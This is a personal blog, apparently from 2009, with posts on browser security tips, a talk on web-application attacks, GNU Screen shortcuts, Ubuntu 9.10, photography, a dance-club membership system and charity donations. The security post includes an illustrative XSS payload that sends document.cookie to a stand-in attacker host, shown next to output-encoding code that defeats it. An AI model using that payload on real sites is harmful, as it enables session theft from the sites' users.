Five Steps To Protect Against Browser Attacks

Some days, it pains me to see how woefully insecure some web browsers are. Every day, it seems that ten new browser-based exploits (or client-side attacks, as my presentation will tell you) are publicly released, and just because you’re on a site that you think is legitimate doesn’t mean that somebody hasn’t compromised it.

For those of you using Internet Explorer (IE), I pity you. IE, still being the #1 most commonly-used browser in the world, is by far the most-attacked of all the major browsers. If you’re smart enough to use another, better browser, then you’re already one step towards protecting yourself. I’m going to assume, though, that you’re using Firefox or one of its derivatives such as Flock, since the plug-in libraries are huge.

1. Use the Web of Trust
My Web of Trust (MyWOT) is a plugin for Firefox that warns you about potentially risky sites. It can alert you to known scam sites, spam sites, and pages that are known for hosting malware. It’s great for getting an idea of how trustworthy the site you are visiting is, and it adds a useful extra layer of protection before a page ever gets the chance to attack your computer.

2. Block Javascript and Popups

NoScript and AdBlock Plus:
One of the most common browser-based attacks is cross-site scripting, or XSS. Javascript is the scripting language that websites run inside your browser, and most of the time its use is legitimate; when you post something on somebody’s wall on Facebook, Javascript pushes the new message onto their wall without refreshing the page, and creates that cool sliding effect as the old posts move down the page. The same language can be turned against you, though. In an XSS attack, somebody gets their own Javascript injected into a page on a site you trust, and your browser runs it with that site’s privileges. Stealing login credentials and session cookies is the common case, but I’ve seen Javascript sophisticated enough to hijack your browser, forcing you to visit sites without you having any input, or to kick off a drive-by download that installs malware and viruses against your will. NoScript blocks all Javascript by default, and then you tell it which sites you want to enable. It takes a while to configure properly, but after a week or so of setting it up, you’ll be a lot more secure. Malicious scripts sometimes arrive through ad networks, so AdBlock Plus is nice to have as well.
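As an added example (this is illustration code, not anything from the original post), here is the mechanism in miniature: a search page that echoes the query straight into its HTML, the kind of link an attacker would send you, and the same page with output encoding so the payload is displayed as text rather than run. The page, the payload and the collector address are all hypothetical.

```javascript
// Added example (not from the original post): how an XSS payload ends up
// executing in your browser, and why output encoding on the site side stops it.
// Everything here is constructed for illustration; the vulnerable page,
// the attacker's payload and the collector host are hypothetical.

// A search page that echoes the query back into the HTML. This is the
// vulnerable pattern: untrusted input concatenated straight into markup.
function renderResultsUnsafe(query) {
  return '<h1>Results for ' + query + '</h1>';
}

// Minimal HTML entity encoding for text placed between tags.
function escapeHtml(text) {
  return String(text).replace(/[&<>"']/g, (ch) => ({
    '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;',
  })[ch]);
}

// The hardened version: the same page, but the query is encoded first, so
// whatever the attacker typed is shown as text instead of parsed as HTML.
function renderResultsSafe(query) {
  return '<h1>Results for ' + escapeHtml(query) + '</h1>';
}

// What an attacker might put in a link they send you. When the vulnerable
// page reflects it, the browser sees a real <img> tag whose onerror handler
// ships your session cookie to the attacker (hypothetical host).
const PAYLOAD =
  '<img src=x onerror="new Image().src=' +
  "'https://attacker.example/steal?c='+document.cookie" + '">';

// Does the rendered page contain a tag with an event handler, or a script
// tag, that the page's author never wrote? (Rough check, fine for the demo.)
function containsInjectedScript(html) {
  return /<[^>]+\son\w+\s*=/i.test(html) || /<script\b/i.test(html);
}

// Run both renderers against the payload.
const unsafeHtml = renderResultsUnsafe(PAYLOAD);
const safeHtml = renderResultsSafe(PAYLOAD);
console.log('vulnerable page injected?', containsInjectedScript(unsafeHtml)); // true
console.log('hardened page injected?  ', containsInjectedScript(safeHtml));   // false
```

The site owner fixes this with the encoding shown in renderResultsSafe; NoScript is the client-side backstop, because it stops the injected script from running at all on any site you have not explicitly trusted.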

3. Use Different Passwords

This always seemed like a no-brainer to me, but I know many other people who won’t do this. Using the same password for multiple sites is just stupid. If somebody manages to steal your password from one site, what’s stopping them from trying it on the next one (and no, having a different user name isn’t going to prevent anything)? Instead of using the same password, use different ones, minimum 8 characters, made up of random characters. If you can’t remember all of those, take two 4-character random strings and the domain name, and put one random string on either side of the domain; there’s your password. For example: “4n$sFACEBOOKn4%l”. Swap “e” for “3”, “s” for “$” or “l” for “1” – think L33T! One caveat: the pattern is only a secret until one of these passwords leaks, at which point anyone who reads it can guess your password for every other site, so a password manager that generates an unrelated random password per site is the stronger option if you can live with one.

4. Clear Those Tracking Cookies
Although you may not realize it, tracking cookies are used to follow your movement around the internet. The pages you visit may be very different, but the company displaying the ads on them is often the same, and a cookie it set on one site gets sent back to it from every other site that carries its ads. Beat these cookies with BetterPrivacy, which removes tracking cookies and LSOs (Flash “cookies”, which the browser’s normal cookie controls don’t touch) from your browser.
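To make the cross-site part concrete, here is an added example (not from the original post) that replays a constructed browsing log of page visits, the resources each page pulled in, and the Set-Cookie headers those resources returned, then picks out the cookie domains that were set as third-party cookies across several unrelated sites. The site and ad-network names are hypothetical, and the two-label domain rule is a simplification of what a real browser does with the Public Suffix List.

```javascript
// Added example (not from the original post): why a third-party cookie can
// follow you from one site to another. The "browsing log" is constructed for
// illustration; site and ad-network names are hypothetical.

// Each entry: the page you visited, the resource it pulled in (an ad script,
// a tracking pixel, a stylesheet) and the Set-Cookie header that resource sent.
const BROWSING_LOG = [
  { page: 'https://news.example/politics', resource: 'https://ads.adnet.example/banner.js',
    setCookie: 'uid=7a1f; Domain=.adnet.example; Path=/; Expires=Fri, 01 Jan 2038 00:00:00 GMT' },
  { page: 'https://news.example/politics', resource: 'https://news.example/style.css',
    setCookie: 'theme=dark; Path=/' },
  { page: 'https://recipes.example/pasta', resource: 'https://ads.adnet.example/banner.js',
    setCookie: 'uid=7a1f; Domain=.adnet.example; Path=/; Expires=Fri, 01 Jan 2038 00:00:00 GMT' },
  { page: 'https://shop.example/cart', resource: 'https://shop.example/api/session',
    setCookie: 'sid=abc123; Path=/; HttpOnly' },
  { page: 'https://shop.example/cart', resource: 'https://px.adnet.example/pixel.gif',
    setCookie: 'uid=7a1f; Domain=.adnet.example; Path=/' },
];

// Registrable domain, taken here as the last two labels of a hostname. A real
// browser consults the Public Suffix List (so co.uk and friends work); the
// two-label rule is an assumption that holds for these constructed hosts.
function registrableDomain(hostname) {
  return hostname.replace(/^\./, '').split('.').slice(-2).join('.');
}

// Parse the cookie name and its Domain attribute (defaulting to the host that set it).
function parseSetCookie(header, resourceUrl) {
  const parts = header.split(';').map((p) => p.trim());
  const name = parts[0].split('=')[0];
  const domainAttr = parts.slice(1).find((p) => /^domain=/i.test(p));
  const domain = domainAttr ? domainAttr.split('=')[1] : new URL(resourceUrl).hostname;
  return { name, domain: registrableDomain(domain) };
}

// A cookie is third-party when its domain differs from the page's registrable domain.
function isThirdParty(entry) {
  const pageDomain = registrableDomain(new URL(entry.page).hostname);
  return parseSetCookie(entry.setCookie, entry.resource).domain !== pageDomain;
}

// Cookie domains that were set as third-party cookies on two or more distinct
// first-party sites: that list is the tracker's view of your browsing history.
function findCrossSiteTrackers(log) {
  const seenOn = new Map(); // cookie domain -> Set of first-party domains
  for (const entry of log) {
    if (!isThirdParty(entry)) continue;
    const { domain } = parseSetCookie(entry.setCookie, entry.resource);
    const pageDomain = registrableDomain(new URL(entry.page).hostname);
    if (!seenOn.has(domain)) seenOn.set(domain, new Set());
    seenOn.get(domain).add(pageDomain);
  }
  return [...seenOn.entries()]
    .filter(([, sites]) => sites.size >= 2)
    .map(([domain, sites]) => ({ domain, sites: [...sites].sort() }));
}

console.log(findCrossSiteTrackers(BROWSING_LOG));
// [ { domain: 'adnet.example', sites: [ 'news.example', 'recipes.example', 'shop.example' ] } ]
```

The first-party cookies (theme, sid) never leave the site that set them; the uid cookie from the ad network is returned from three unrelated sites, which is exactly the record BetterPrivacy is clearing when it deletes tracking cookies.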

5. If You Didn’t Expect To Get It, Don’t Click It

I hate to have to reiterate common sense, but sometimes it escapes us. If you didn’t expect to get a link from somebody, or they sent you a file that you weren’t planning on getting, don’t open it. I don’t care if it came from their MSN account; if they didn’t follow rule #3, there’s no reason why their account couldn’t have been hacked. If someone sends you a link, do yourself a favour and just ASK the person what it is before you click it; if you get a reply that is something your friend would say, then you’re probably okay.

Well, that took longer than expected. Hopefully that’s of some use for people. As always, I appreciate your comments and feedback. If you like what you read, help me out by posting the article on Reddit, Facebook, or Digg (or sending the link to a friend). See you next Monday!

I’m Back

Well, it’s been a while since I’ve posted; about three weeks, actually. To the one or two readers I have, my apologies that you don’t have something to waste your time on twice per week. I’m getting back into the writing mood, so I should be building up a buffer of things to write in the near future.

A lot has happened since I last talked about the IPAM presentation that I took part in. To start with the related topic, I was approached to do the presentation again, this time internally to other departments. Thus, the other co-op student and I set about cleaning up the presentation a bit, fixing some errors, and making it flow smoother. It went much better the second time, thankfully, both from a public speaking perspective and a demonstration perspective. As fun as it was to work on that, I’m glad it’s over and done with right now.

Speaking of work, the number of days that I have left at IPC are dwindling quickly as the new year approaches. I work until December 31st, at which point I’m back in class. It’s been a fun past couple of months, and the paychecks have been very nice, but I’m also looking forward to getting back on campus to get some more studying done. I’ve decided that I won’t get a job during the winter semester so I can concentrate on my studying; I’ll have more than enough money to get through four months, and then I’ll be working in the summer again.

After that presentation was done with at work, I found that I had a fair amount of spare time, as there weren’t too many tasks to work on. I spent that time learning Ruby on Rails, and putting that knowledge towards the new UMSwing site. Although on the outside it will look almost the same as before, this new site will have an extensive backend that will make UMSwing virtually paperless. Although you may not think we use that much paper, think again; I have a full 3″ 3-ring binder in our office that says otherwise. All of our memberships, attendance, and transactions will be tracked on the web application, thus eliminating the need for those pieces of paper to be printed in the first place. Anyways, I’ve been working very hard on the site, and it’s almost ready to be tested by some other people. So, if you’re interested in testing some software for an eco-friendly cause, let me know in the comments section and I’ll keep you informed.

That’s a quick update on what’s happened in the past few weeks at work. I have a few more updates to spew out in the coming days, one of them involving my server upgrade (*cough* RAID *cough*), and some involving some extra-curricular activities (including some new photos to go up soon).

IPAM Presentation: November 2009

Last Wednesday, the other co-op student working with me and I gave a presentation to the Information Protection Association of Manitoba (IPAM) about attacks on web-based applications. It was certainly an interesting experience. Although it wasn’t a stellar performance, I think we did okay considering our presentation skills. Unfortunately we were expecting a slightly larger proportion of technical-minded people rather than business-minded people, and thus I got the impression that some of the talk was a little over the heads of a few of those in attendance. Regardless, it was a learning experience, and one I got a lot out of.

I was approached twice after our presentation was over. The first gentleman, to paraphrase, suggested that the presentation would be more useful had it included a mitigation strategy to prevent and (hopefully) eliminate the possibility of attack. I thought he might be on to something here. After all, wouldn’t it be great to have a check list to go through, and making sure each item is checked off would result in a secure application? For the rest of the day, I spent a lot of time going back and forth on this idea. On one hand, this check list would be nice, but I also firmly believe that a large amount of the prevention relies on the skill level of the programmer, debugger, and penetration tester, and a check list simply wouldn’t be sufficient to protect yourself from attacks. But, having the check list would be a good start. Sort of an “if you’ve done these things, you’ve covered the basics” check list. It would be a good reminder sheet for pro programmers, and a good stepping stone for those who are just starting off. To that person, your suggestion has been heard, and the check list has been added to my to-do list, hopefully to have a first draft out within a month or so, so stay tuned for that.

The second gentleman asked if the slides to the presentation would be online for later viewing. At the end of the presentation, although we took almost an hour, I was well aware that we were rushing; we probably had too much content that we wanted to cover. Before the presentation I had already planned to put the slides online as a reference; although it’s nice to see the slides during the talk, it’s also nice to go back and view them at a later date. Thus, my slides will be online here for anybody to take a look at. I will also be posting my source code, but that will be a bit later (i.e. probably next week), since there are a few sections that are a little finicky right now.

A Busy Past Two Weeks

So my twice-per-week updates seem to have fallen a bit behind as of late. To those one or two dedicated readers, my apologies for not giving you something to burn a couple minutes from your day with.

I have three culprits to lay the blame for this lack of updates. One of those has been a savage case of writer’s block. Another of those has been a very busy schedule for me. Busier than normal, even. As such, the third and final culprit goes by the name of “Sleep Deprivation”, which always seems to tag along with culprit number two. In a possibly vain attempt to get myself back on my writing pedestal, I figured I’d fill you all in about the past two weeks.

As those of you who are involved in the Winnipeg swing scene may know, UMSwing had two events to demo at last weekend, the first being the Gilbert & Sullivan Gala Fund-raiser, and the second being the Winnipeg Jazz Orchestra’s performance. The fund-raiser involved a couple of demonstration songs, and the WJO performance involved dancing for 20 minutes during their intermission, as well as the opportunity for one or two couples to dance on stage during one of their songs. Although they took place over the weekend, I’ve been in talks with organizers of both events for quite some time, and the last week became crunch time for me as I made sure everything went as expected. I’m really glad that we were invited to both events, and we’d certainly be interested in doing it again.

To swing (no pun intended) from one quirky interest to another, this Wednesday a couple of us took advantage of the day off and planned for a session of Dungeons & Dragons. I need to take a minute here to explain this:

  • No, it did NOT die out ten years ago
  • Yes, it IS fun
  • No, you do NOT need to be an über-nerd to play
  • Yes, girls DO play it.

Anyway, in this group (which has yet to receive a name), I am the DM; I’m the one who tells the story, plays the non-player characters (NPCs), and guides the other players through their adventures. Although very fun to DM, it also requires a lot of work to create your own adventures; dungeons, the global map, encounters, and NPCs all need to be planned. Thus, that chewed through a fair amount of spare time that I had. On the plus side, I over-prepared, so I have everything I need for the next time around.

This weekend, I have plans to go out to a friend’s cottage for some much-needed rest. It’ll be nice to get away from it all, and hopefully take some great photos, which I hope to put up for Monday’s post. I also have some ideas for another Linux command line tip, so those of you reading my previous post regarding Byobu: stay tuned.


GNU Screen and Byobu Made Easy

For the *nix elitist, no graphical tool comes close to the power that the command line provides. While this may strike some people as odd, particularly those who only have experience with Windows, it’s a pretty well known fact that the Linux command line provides a method of controlling every aspect of your computer activity; this is so much the case that many GUI applications on Linux are just command line “wrappers”, hiding you from what’s actually happening behind the scenes.

While this is all fine and dandy, things like development and multi-tasking can prove a little frustrating when you connect to a remote machine and need more than one window open. A plain command line pretty much rules this out, but GNU Screen or Byobu makes things a lot smoother: one window, multiple command lines.

As most developers will tell you, having multiple windows available to you is a godsend. It’s particularly useful when you have scripts to run in the background that generate output, but you don’t want to fork them as a daemon. Now, with GNU Screen and Byobu, you can do this easily, and even make your screen look snazzy as well. The only drawback to these utilities is that they are a little hard to get used to. In this post, I will quickly outline some of the key combinations which I use regularly.

GNU Screen and Byobu Simplified

The number one thing to remember about every command you use is Ctrl+A, which will be written as C-a. This is picked up by screen and will tell the utility that the next characters typed will be commands for screen to interpret. Keeping in mind that all keys are case-sensitive (as most things are in Linux), take a look at some of the commands below:

C-a c - Create a new screen window

C-a A - Rename the current window (the title shown in the window list)

C-a C-a - Go back to the previous window

C-a <0-9> - Switch to screen #0-9 (quick toggle)

C-a " - View a list of the current screens, which will allow you to select one from the list

C-a ' - Enter a screen number to switch to (slower version of C-a <0-9>)

C-a d - Detach the whole screen session and fork to the background. Very useful for remote sessions you want to leave open. The command "screen -r" will resume your screen session.

C-a <Escape> (or C-a [) - Enter copy/scrollback mode so you can scroll up through your command line "history" and see what output you previously got. Hitting <Escape> again cancels it.

With the introduction of Byobu in Ubuntu 9.10, you can also get some statistics added to the bottom of your command line window to help keep you informed about the state of the system you are running on. Hitting F9 in session will bring up the menu for customization, which can make your screen session look pretty awesome. Instead of running screen to start your session, simply run byobu. Easy as pie.

If you have any questions about GNU Screen or Byobu, let me know and I’ll see what I can do to answer them. Stay tuned on Friday for another issue of “Five Things” (hopefully).

Oct. 24 Photography Update

Now that I’ve been taking more photos recently, I’m getting into the habit of posting them up a little more frequently. Rest assured, I’ll keep you all updated when I put up new photos. If you want to take a look at some of my other photos, just head to the gallery.

As always, I welcome your feedback; just post a comment below!


Ubuntu’s Koala Has Good Karma

It’s not like me to gush over operating systems. Particularly looking at what we’ve dealt with in the past. If we’re lucky, we got stability in an OS, but usually at the expense of it looking terrible. This year seems to have caused things to change, however. With the release of the Windows 7 RC, Microsoft has restored a good amount of the faith that it lost after churning out the load of crap that it called Vista.

The open source community is never far behind, and Canonical’s Ubuntu 9.10 operating system is a work of art. Seriously. I would frame it and mount it on my wall if I could. Unfortunately I can’t, so all I can do is gush about it and tell people about all of its amazing features. Non-techies: just smile-and-nod your way through this post :).

Ubuntu One

Cloud computing is all the rage these days, and Ubuntu has jumped on the bandwagon by presenting One, a personal cloud for the synchronization of files across multiple Ubuntu computers. Set up your account, get your 2 gigs of free space, move files into the Ubuntu One folder, and let them sync. Easy as pie.

ext4 Filesystem

Following in Fedora’s footsteps, Ubuntu has set ext4 as 9.10’s default filesystem. Although you won’t make the switch if you upgrade, fresh installs will feel the warm glow of ext4 during their install.

Uncomplicated Firewall

One of my main complaints with Ubuntu’s previous setups is that the firewall isn’t switched on by default, and that is still the case in 9.10; ufw, the Uncomplicated Firewall, has actually shipped with Ubuntu since 8.04, but it sits disabled until you enable it. Once you do, though, there’s no more sifting through the iptables man pages to figure out how to add a simple allow rule; ufw makes firewall management easy, and turning it on and opening the handful of ports you need is a matter of a few short commands.

Faster Load Times with Upstart

Another popular trend recently has been the goal of reducing boot times as much as possible. Fedora Project made waves as they aimed for a 20 second boot time from BIOS to login page. Although they were a little short of their goal, they made some important headway, showing that not every single scrap needs to be loaded and cached on boot. Ubuntu has carried this forward and has made a similar goal. Although they don’t mention any specific time-related goals, 9.10 moves much more of the boot sequence onto native Upstart jobs (Upstart has been Ubuntu’s init system since 6.10, but most services were still started by the old sysvinit scripts), which makes the loading screen look smooth and cuts the boot time significantly.

Overall, I’m really happy with the progress Ubuntu has made. Although a lot of previous versions have fallen a bit behind on the times in exchange for having a stable system, they are catching up with the times and even pushing the envelope with new ideas. If you were looking for a reason to switch to Linux, put this one at the top of your list. If you’re not convinced, download the LiveCD and try it out without installing (although your performance will suffer since it’s loading from a CD…duh…).

Thanks for giving this a read, everyone. If you like what you see, or have any suggestions for further writings, drop me a line in the comments section below and give me a vote on Reddit or Digg. I read each and every one of your comments: I promise :)

The New Camera Lens: Some Sample Photos

I recently picked up a new lens for my Canon Rebel XTi DSLR camera: the EF 50mm f/1.8 II, to be precise. It’s the first lens I’ve bought for my camera so far, mainly because almost every other lens is god-awful expensive. At only $130, this was a steal of a deal, and if you have a Canon DSLR camera body, I highly recommend picking yourself up one of these.

By popular demand of a few of my friends, I’m putting up a small sampling of the photos I’ve taken with it over the past few days. Although I’m still getting used to the lens, I’m really happy with the results so far. You can check out the full album of new photos right here.


From Paperwork to Web 2.0: UMSwing’s New Membership System

Nowadays, my life has a good amount of its time consumed with either work or swing dancing. I work every weekday, and four nights every week I’m dancing. Being the nerd that I am, I always look for opportunities to intertwine my hobbies, despite them being complete opposites. Being on the executive committee helps a lot with that, since I take the position of Web Administrator and Graphics Designer with UMSwing.

On the way home from an event a couple weeks ago, I was talking with a friend about the hassle of all the paperwork we have to go through every time we have a lesson; we need to fill out transaction logs for each payment, keep track of every person’s attendance for each class, and also mark it on their membership form that they attended and paid for that class. A single person dropping in to that class requires writing on three sheets of paper. When you’re trying to run everybody through quickly, that starts becoming an issue.

This friend, being the kind of person that seems to regurgitate good ideas on demand, suggested to me, “Brian, you’re a developer. Just write a program to do it for you. You’re learning Ruby and Rails, so you can do a web-based backend and a GUI frontend. Problem solved!”. Thus, I sat down and started planning. Rails seems to be yet another one of those frameworks that lacks any decent documentation or tutorials. If you plan on learning it, pick up “Agile Web Development With Rails”. It is by far the best development book I have ever read. If it’s any sort of selling point, one of the authors created the Rails framework; if he doesn’t know how to use the framework, nobody does.

As a method for potentially helping me brainstorm, I’ve decided to spill out some of my ideas and goals here. I’m only going to discuss a few ideas here; while I would normally immediately distribute this idea into the public domain, I’ve decided to keep this one closed source. If you have any suggestions or ideas, let me know and I will give you credit. Better yet, if you’re interested in this software, get in touch and we can discuss it.

Goals for Dance Site

  • Members: Keep track of all members, regardless of how long ago they joined. Eliminate the need to fill out a new membership form every semester. Each member should be assigned a member number, which can be put on a barcode. Keep track of personal information, interests, and attendance. Gather statistics/metrics from attendance vs. month/day/semester, etc.
  • Memberships: Handle multiple membership types, including drop-in. Integrate with finances to determine when a user has paid for their membership through drop-ins. Support for online payments through Paypal (i.e. Mastercard, Visa, eCheck, etc.)
  • Finances: handle per-lesson incomes. Support for multiple lessons per day. Keep track of what is taught during that lesson. Provide unlockable content for each lesson; attendance to that lesson unlocks the content for that member; refresher videos, class notes, etc. Support for discounted membership dates/times.
  • Graduated system: attendance of X number of events allows you to attend higher level classes. Ability to override by administrator.
  • Mailing List: Separate old members from current members, allowing class updates to be sent to current members only, while global events are sent to all. Ability to unsubscribe.

Have Air Miles, Will Donate To Charity

I’m sure many of you collect some sort of rewards on a reward program, be it Aeroplan or Air Miles, or some other similar program. Myself, I’m an Air Miles person, and a lot of that has to do with the really good deal that I get for Safeway prescriptions.

But I digest ;)

While casually browsing the rewards catalog online, I was going through the gift cards and subscriptions. I happened to notice a new section for charities. Under there, you can redeem 170 Air Miles to donate $20 to one of three charities: Kids Help Phone, Special Olympics Canada, and the World Wildlife Fund. Unfortunately, Air Miles has yet to add any more charities, but I sincerely hope that they add more than those three. I’ve made a firm decision to redeem a donation for every item I redeem on there.

I’ve never seen this on a rewards site, and I think it’s a great thing to do. Think about how many reward miles you have. When was the last time you redeemed them? Do you think you could spare a few to help a good cause? I hope the answer is yes. Some people don’t donate to charities because they can’t afford it. Now that you can use Air Miles, this should make things a little easier. Alternatively, redeem a gift certificate somewhere you would normally shop, and give the money you saved to a charity of your choice. Either way, it’s a free donation.

Just a little food for thought.